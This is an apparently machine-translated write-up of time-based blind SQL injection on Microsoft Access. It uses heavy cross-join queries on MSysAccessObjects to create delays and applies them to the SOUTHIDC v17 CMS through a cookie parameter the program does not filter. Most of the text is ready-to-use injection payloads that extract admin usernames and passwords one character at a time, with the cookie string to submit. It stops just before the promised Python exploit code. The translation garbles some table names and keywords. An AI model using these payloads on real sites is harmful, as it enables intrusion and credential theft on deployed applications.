An Access database implementation record based on time SQL blinds

Access is a database management system that Microsoft combines the graphical user interface of the database engine with the software development tools. This article looks at the implementation record of the Access database based on the time SQL blind.

　　Overview

As we all know, Access databases do not support a time based blind method, but we can use the system table MSysAccessObjects of access to implement it through a load query (Heavy Queries).

　　Preliminary exploration

We take the SOUTHIDCV17 database as an example

Executes the SELECT * from Southidc_about, returning the results shown below.

How do I implement time base injection? We're going to use this statement.

SELECT Count (*) from msysaccessobjects as T1, msysaccessobjects as T2, msysaccessobjects as T3, msysaccessobjects as T4, M Sysaccessobjects as T5, msysaccessobjects as T6,

MSysAccessObjects as t7,msysaccessobjects as t8,msysaccessobjects as t9,msysaccessobjects as T10,MSysAccessObjects as T11,msysaccessobjects as T12

The specific implementation methods are as follows:

SELECT * FROM Southidc_about where (select COUNT (*) from msysaccessobjects as T1, msysaccessobjects as T2, MSYSACCESSOBJEC TS as T3, msysaccessobjects as T4, msysaccessobjects as T5, msysaccessobjects as T6,

MSysAccessObjects as t7,msysaccessobjects as t8,msysaccessobjects as t9,msysaccessobjects as T10,MSysAccessObjects as T11,msysaccessobjects as T12) >0 and (select 1 ASC (Mid (adminname+password,1,1)) from

Southidc_admin) =97

We can do it once and observe the effect.

Apparently, it took about 40s to return the result.

When we execute the following statement, we change the last 97 to 96.

SELECT * FROM Southidc_about where (select COUNT (*) from msysaccessobjects as T1, msysaccessobjects as T2, MSYSACCESSOBJEC TS as T3, msysaccessobjects as T4, msysaccessobjects as T5, msysaccessobjects as T6,

MSysAccessObjects as t7,msysaccessobjects as t8,msysaccessobjects as t9,msysaccessobjects as T10,MSysAccessObjects as T11,msysaccessobjects as T12) >0 and (select 1 ASC (Mid (adminname+password,1,1)) from

Southidc_admin) =96

It was executed quickly, without delay.

It's obvious that we passed the Where condition after the

(SELECT count (*) from msysaccessobjects as T1, msysaccessobjects as T2, msysaccessobjects as T3, msysaccessobjects as T4, MSysAccessObjects as T5, msysaccessobjects as T6,

MSysAccessObjects as t7,msysaccessobjects as t8,msysaccessobjects as t9,msysaccessobjects as T10,MSysAccessObjects as T11,msysaccessobjects as T12) >0

The delay is realized, but it is important to note that there is a sequence of conditions here, and the statement that implements the delay must be

1 (SELECT top 1 ASC (Mid (adminname+password,1,1)) from Southidc_admin) =97

Before, for what? The conclusion of the experiment.

　　Instance implementation

In SOUTHIDC 17, there is an SQL injection vulnerability, but the conventional approach does not successfully exploit the vulnerability. The vulnerability code is as follows:

Although the program filtered the data for post and get, we still can inject it through the way cookies are submitted.

OK, let's do a bit of injection utilization.

The statements we need to inject are:

SELECT * from Southidc_ ' &request (' Range ') & ' Sort where Viewflag and parentid= ' &ParentID& ' ORDER by ID ASC

By submitting cookies

Range=downsort WHERE (SELECT count (*) from msysaccessobjects as T1, msysaccessobjects as T2, msysaccessobjects as T3, Msys Accessobjects as T4, msysaccessobjects as T5, msysaccessobjects as T6, msysaccessobjects as t7,msysaccessobjects as T8,MSy Saccessobjects as t9,msysaccessobjects as t10,msysaccessobjects as t11,msysaccessobjects as T12) >0 and (select top 1 AS C (Mid (adminname+password,1,1)) from Southidc_admin) =32 and 1=1 Union select Null,null,null,null,null,null from SOUTHIDC _image

ParentID The value that is passed into the upper part of the program, and the final statement is:

1select * from Southidc_downsort where (SELECT count (*) from msysaccessobjects as T1, msysaccessobjects as T2, Msysaccesso Bjects as T3, msysaccessobjects as T4, msysaccessobjects as T5, msysaccessobjects as T6, msysaccessobjects as T7,msysacces Sobjects as t8,msysaccessobjects as t9,msysaccessobjects as t10,msysaccessobjects as t11,msysaccessobjects as T12) >0 a nd (SELECT top 1 ASC (Mid (adminname+password,1,1)) from Southidc_admin) =32 and 1=1 Union select Null,null,null,null,null,n Ull from Southidc_imagesort where Viewflag and parentid=1

We can look at the effect in the Finder

96 o'clock, no delay, as shown in figure:

97 o'clock delay, the effect of the following figure:

Next, we can use the above statement for exp writing, the author here with Python

The core code is as follows: